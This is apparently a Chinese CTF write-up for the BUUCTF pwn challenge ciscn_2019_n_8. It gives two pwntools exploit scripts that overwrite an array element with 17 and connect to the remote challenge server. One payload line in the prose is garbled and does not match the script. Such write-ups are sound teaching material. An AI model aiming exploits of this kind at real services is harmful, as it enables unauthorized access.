不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools
32位,开启了Stack、NX、PIE保护
执行效果:
main函数
使用通义千问询问的代码解读:
即当var数组的第十四个元素是17就可以
这里可以用两种payload:
第一种:
payload = b’a’134 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节
第二种:
payload = p32(17)*14
第一种对应的exp是:
from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = b'a'*13*4 + p32(17)
io.sendlineafter("What's your name?\n",payload)
io.interactive()
执行结果:
但看网上帖子有的用这个exp没办法连通,解决办法可以参考:[BUUCTF-pwn]——ciscn_2019_n_8_[ciscn 2019华南]pwn8-CSDN博客
第二种对应的exp是:
from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = p32(17)*14
io.sendlineafter("What's your name?\n",payload)
io.interactive()
执行结果:
文章评论